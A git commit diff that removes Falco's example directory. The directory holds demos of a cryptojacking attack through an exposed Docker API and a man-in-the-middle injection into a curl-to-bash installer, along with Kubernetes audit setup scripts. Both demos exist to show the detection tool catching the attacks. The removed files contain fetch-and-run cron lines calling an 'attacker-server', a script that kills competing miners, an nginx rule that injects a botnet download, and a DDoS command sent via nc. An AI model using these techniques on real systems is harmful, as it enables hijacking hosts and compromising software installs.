update(examples): move /examples to contrib repo

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
This commit is contained in:
Leonardo Grasso 2020-05-06 14:55:50 +02:00 committed by poiana
parent ede2ef8706
commit 9242c45214
29 changed files with 0 additions and 1114 deletions

View File

@ -1,2 +0,0 @@
labels:
- area/examples

View File

@ -1,117 +0,0 @@
# Demo of Falco Detecting Cryptomining Exploit
## Introduction
Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Falco.
Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
## Requirements
In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
## Example architecture
The example consists of the following:
* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
* `attacker-server`: A nginx instance that serves the malicious files and scripts using by the attacker.
* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
A separate container is created to launch the attack:
* `docker123321-mysql` An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The json container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
## Example Walkthrough
### Start everything using docker-compose
To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
You will see fairly verbose output from dockerd:
```
host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
```
When you see log output like the following, you know that falco is started and ready:
```
falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
```
### Launch malicious container
To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
The script `launch_malicious_container.sh` performs the necessary POSTs:
* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`
Run the script via `bash launch_malicious_container.sh`.
### Examine cron output as malicious software is installed & run
`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
```
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```
It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron/update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
```
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql
```
Once the cron job runs, you will see output like the following:
```
host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
host-machine_1 | ***Checking for existing Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
host-machine_1 | ***Killing competing Miner programs
host-machine_1 | ***Reinstalling cron job to run Miner program
host-machine_1 | ***Configuring Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
host-machine_1 | ***Configuring system for Miner program
host-machine_1 | vm.nr_hugepages = 9
host-machine_1 | ***Running Miner program
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
```
### Observe Falco detecting malicious activity
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
```
### Cleanup
To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.

View File

@ -1,14 +0,0 @@
server {
listen 8220;
server_name localhost;
location / {
root /usr/share/nginx/html;
index index.html index.htm;
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
}

View File

@ -1 +0,0 @@
{"config": "some-bitcoin-miner-config-goes-here"}

View File

@ -1,64 +0,0 @@
#!/bin/sh
echo "***Checking for existing Miner program"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Killing competing Miner programs"
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/sshd
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
echo "***Reinstalling cron job to run Miner program"
crontab -r || true && \
echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true
echo "***Configuring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Configuring system for Miner program"
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Running Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "***Ensuring Miner program is alive"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
echo "***Reconfiguring Miner program"
curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
curl -so /var/tmp/jaav http://attacker-server:8220/minerd
chmod 777 /var/tmp/jaav
cd /var/tmp
echo "***Reconfiguring system for Miner program"
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=$num
echo "***Restarting Miner program"
nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

View File

@ -1,7 +0,0 @@
#!/bin/bash
while true; do
echo "Mining bitcoins..."
sleep 60
done

View File

@ -1,41 +0,0 @@
version: '3'
volumes:
host-filesystem:
docker-socket:
services:
host-machine:
privileged: true
build:
context: ${PWD}/host-machine
dockerfile: ${PWD}/host-machine/Dockerfile
volumes:
- host-filesystem:/etc
- docker-socket:/var/run
ports:
- "2375:2375"
depends_on:
- "falco"
attacker-server:
image: nginx:latest
ports:
- "8220:8220"
volumes:
- ${PWD}/attacker_files:/usr/share/nginx/html
- ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
depends_on:
- "falco"
falco:
image: falcosecurity/falco:latest
privileged: true
volumes:
- docker-socket:/host/var/run
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
tty: true

View File

@ -1,7 +0,0 @@
{
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
"Image": "alpine:latest",
"HostConfig": {
"Binds": ["/etc:/mnt/etc"]
}
}

View File

@ -1,12 +0,0 @@
FROM docker:stable-dind
RUN set -ex \
&& apk add --no-cache \
bash curl
COPY start-cron-and-dind.sh /usr/local/bin
ENTRYPOINT ["start-cron-and-dind.sh"]
CMD []

View File

@ -1,11 +0,0 @@
#!/bin/sh
# Start docker-in-docker, but backgrounded with its output still going
# to stdout/stderr.
dockerd-entrypoint.sh &
# Start cron in the foreground with a moderate level of debugging to
# see job output.
crond -f -d 6

View File

@ -1,14 +0,0 @@
#!/bin/sh
echo "Pulling alpine:latest image to docker-in-docker instance"
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
echo "Creating container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
echo "Running container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'

View File

@ -1,136 +0,0 @@
This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
Either using static audit backends in Kubernetes 1.11, or in Kubernetes 1.13 with dynamic sink which configures webhook backends through an AuditSink API object.
<!-- toc -->
- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
* [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
* [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
* [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
* [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
* [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
* [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
* [Deploy AuditSink objects](#deploy-auditsink-objects)
* [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
<!-- tocstop -->
## Instructions for Kubernetes 1.11
The main steps are:
1. Deploy Falco to your Kubernetes cluster
1. Define your audit policy and webhook configuration
1. Restart the API Server to enable Audit Logging
1. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Falco documentation website](https://falco.org/docs/installation/). You can also find useful resources for creating a service account, service, configmap, and daemonset in the [contrib](https://github.com/falcosecurity/contrib) repo.
### Define your audit policy and webhook configuration
The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to an ip associated with the falco service, port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
```
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling audit log support for the apiserver, including copying the audit policy/webhook files to the apiserver machine, modifying the apiserver command line to add `--audit-log-path`, `--audit-policy-file`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube static
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Copying audit policy/webhook files to apiserver...
audit-policy.yaml 100% 2519 1.2MB/s 00:00
webhook-config.yaml 100% 248 362.0KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13
The main steps are:
1. Deploy Falco to your Kubernetes cluster
2. Restart the API Server to enable Audit Logging
3. Deploy the AuditSink object for your audit policy and webhook configuration
4. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling dynamic audit support for the apiserver by modifying the apiserver command line to add `--audit-dynamic-configuration`, `--feature-gates=DynamicAuditing=true`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube dynamic
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Deploy AuditSink objects
[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
```
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
```
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 2211 662.9KB/s 00:00
***Copying audit policy file to apiserver...
audit-policy.yaml 100% 2519 847.7KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
```
The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.

View File

@ -1,72 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
IFS=''
FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
VARIANT=${2:-minikube}
AUDIT_TYPE=${3:-static}
if [ "$AUDIT_TYPE" == "static" ]; then
if grep audit-webhook-config-file "$FILENAME" ; then
echo audit-webhook patch already applied
exit 0
fi
else
if grep audit-dynamic-configuration "$FILENAME" ; then
echo audit-dynamic-configuration patch already applied
exit 0
fi
fi
TMPFILE="/tmp/kube-apiserver.yaml.patched"
rm -f "$TMPFILE"
APISERVER_PREFIX=" -"
APISERVER_LINE="- kube-apiserver"
if [ "$VARIANT" == "kops" ]; then
APISERVER_PREFIX=" "
APISERVER_LINE="/usr/local/bin/kube-apiserver"
fi
while read -r LINE
do
echo "$LINE" >> "$TMPFILE"
case "$LINE" in
*$APISERVER_LINE*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
if [[ $AUDIT_TYPE == "static" ]]; then
echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
fi
fi
if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
fi
;;
*"volumeMounts:"*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo " - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
echo " name: data" >> "$TMPFILE"
fi
;;
*"volumes:"*)
if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
echo " - hostPath:" >> "$TMPFILE"
echo " path: /var/lib/k8s_audit" >> "$TMPFILE"
echo " name: data" >> "$TMPFILE"
fi
;;
esac
done < "$FILENAME"
cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
cp "$TMPFILE" "$FILENAME"

View File

@ -1,82 +0,0 @@
apiVersion: audit.k8s.io/v1beta1 # This is required.
kind: Policy
# Don't generate audit events for all requests in RequestReceived stage.
omitStages:
- "RequestReceived"
rules:
# Log pod changes at RequestResponse level
- level: RequestResponse
resources:
- group: ""
# Resource "pods" doesn't match requests to any subresource of pods,
# which is consistent with the RBAC policy.
resources: ["pods", "deployments"]
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
# Resource "pods" doesn't match requests to any subresource of pods,
# which is consistent with the RBAC policy.
resources: ["clusterroles", "clusterrolebindings"]
# Log "pods/log", "pods/status" at Metadata level
- level: Metadata
resources:
- group: ""
resources: ["pods/log", "pods/status"]
# Don't log requests to a configmap called "controller-leader"
- level: None
resources:
- group: ""
resources: ["configmaps"]
resourceNames: ["controller-leader"]
# Don't log watch requests by the "system:kube-proxy" on endpoints or services
- level: None
users: ["system:kube-proxy"]
verbs: ["watch"]
resources:
- group: "" # core API group
resources: ["endpoints", "services"]
# Don't log authenticated requests to certain non-resource URL paths.
- level: None
userGroups: ["system:authenticated"]
nonResourceURLs:
- "/api*" # Wildcard matching.
- "/version"
# Log the request body of configmap changes in kube-system.
- level: Request
resources:
- group: "" # core API group
resources: ["configmaps"]
# This rule only applies to resources in the "kube-system" namespace.
# The empty string "" can be used to select non-namespaced resources.
namespaces: ["kube-system"]
# Log configmap changes in all other namespaces at the RequestResponse level.
- level: RequestResponse
resources:
- group: "" # core API group
resources: ["configmaps"]
# Log secret changes in all other namespaces at the Metadata level.
- level: Metadata
resources:
- group: "" # core API group
resources: ["secrets"]
# Log all other resources in core and extensions at the Request level.
- level: Request
resources:
- group: "" # core API group
- group: "extensions" # Version of group should NOT be included.
# A catch-all rule to log all other requests at the Metadata level.
- level: Metadata
# Long-running requests like watches that fall under this rule will not
# generate an audit event in RequestReceived.
omitStages:
- "RequestReceived"

View File

@ -1,16 +0,0 @@
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
name: falco-audit-sink
spec:
policy:
level: RequestResponse
stages:
- ResponseComplete
- ResponseStarted
webhook:
throttle:
qps: 10
burst: 15
clientConfig:
url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"

View File

@ -1,46 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
VARIANT=${1:-minikube}
AUDIT_TYPE=${2:-static}
if [ "$VARIANT" == "minikube" ]; then
APISERVER_HOST=$(minikube ip)
SSH_KEY=$(minikube ssh-key)
SSH_USER="docker"
MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
fi
if [ "$VARIANT" == "kops" ]; then
# APISERVER_HOST=api.your-kops-cluster-name.com
SSH_KEY=~/.ssh/id_rsa
SSH_USER="admin"
MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
if [ -z "${APISERVER_HOST+xxx}" ]; then
echo "***You must specify APISERVER_HOST with the name of your kops api server"
exit 1
fi
fi
echo "***Copying apiserver config patch script to apiserver..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
if [ "$AUDIT_TYPE" == "static" ]; then
echo "***Copying audit policy/webhook files to apiserver..."
scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
echo "***Copying audit policy file to apiserver..."
scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
echo "***Done!"

View File

@ -1,14 +0,0 @@
apiVersion: v1
kind: Config
clusters:
- name: falco
cluster:
server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
contexts:
- context:
cluster: falco
user: ""
name: default-context
current-context: default-context
preferences: {}
users: []

View File

@ -1,78 +0,0 @@
# Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
## Demo architecture
### Initial setup
Make sure no prior `botnet_client.py` processes are lying around.
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
* falco: will detect the activities of botnet_client.py.
### Download `install-software.sh`, see botnet client running
Run the following to fetch and execute the installation script,
which also installs the botnet client:
```
$ curl http://localhost/install-software.sh | bash
```
You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
```
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```
At this point, kill the botnet_client.py process to clean things up.
### Run installation script again using `fbash`, note falco warnings.
If you run the installation script again:
```
curl http://localhost/install-software.sh | ./fbash
```
In the docker-compose output, you'll see the following falco warnings:
```
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```

View File

@ -1,7 +0,0 @@
#!/bin/sh
while true; do
echo "Trying to contact compromised machine..."
echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
sleep 5
done

View File

@ -1,51 +0,0 @@
# Owned by software vendor, serving install-software.sh.
apache:
container_name: apache
image: httpd:2.4
volumes:
- ${PWD}/web_root:/usr/local/apache2/htdocs
# Owned by software vendor, compromised by attacker.
nginx:
container_name: mitm_nginx
image: nginx:latest
links:
- apache
ports:
- "80:80"
volumes:
- ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
# Owned by attacker.
evil_apache:
container_name: evil_apache
image: httpd:2.4
volumes:
- ${PWD}/evil_web_root:/usr/local/apache2/htdocs
ports:
- "9090:80"
# Owned by attacker, constantly trying to contact client.
attacker_botnet_master:
container_name: attacker_botnet_master
image: alpine:latest
net: host
volumes:
- ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
command:
- /tmp/botnet_master.sh
# Owned by client, detects attack by attacker
falco:
container_name: falco
image: falcosecurity/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
- ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
tty: true

View File

@ -1,18 +0,0 @@
import socket;
import signal;
import os;
os.close(0);
os.close(1);
os.close(2);
signal.signal(signal.SIGINT,signal.SIG_IGN);
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', 1234))
serversocket.listen(5);
while 1:
(clientsocket, address) = serversocket.accept();
clientsocket.send('Waiting for botnet command and control commands...\n');
command = clientsocket.recv(1024)
clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
clientsocket.close()

View File

@ -1,15 +0,0 @@
#!/bin/bash
SID=`ps --no-heading -o sess --pid $$`
if [ $SID -ne $$ ]; then
# Not currently a session leader? Run a copy of ourself in a new
# session, with copies of stdin/stdout/stderr.
setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
FBASH=$!
trap "kill $FBASH; exit" SIGINT SIGTERM
wait $FBASH
else
# Just evaluate the commands (from stdin)
source /dev/stdin
fi

View File

@ -1,12 +0,0 @@
http {
server {
location / {
sub_filter_types '*';
sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
sub_filter_once off;
proxy_pass http://apache:80;
}
}
}
events {
}

View File

@ -1,156 +0,0 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
set -e
function install_rpm {
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
yum -q -y install curl
fi
echo "*** Installing my-software public key"
# A rpm --import command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.repo <some url> would normally be here
echo "*** Installing my-software"
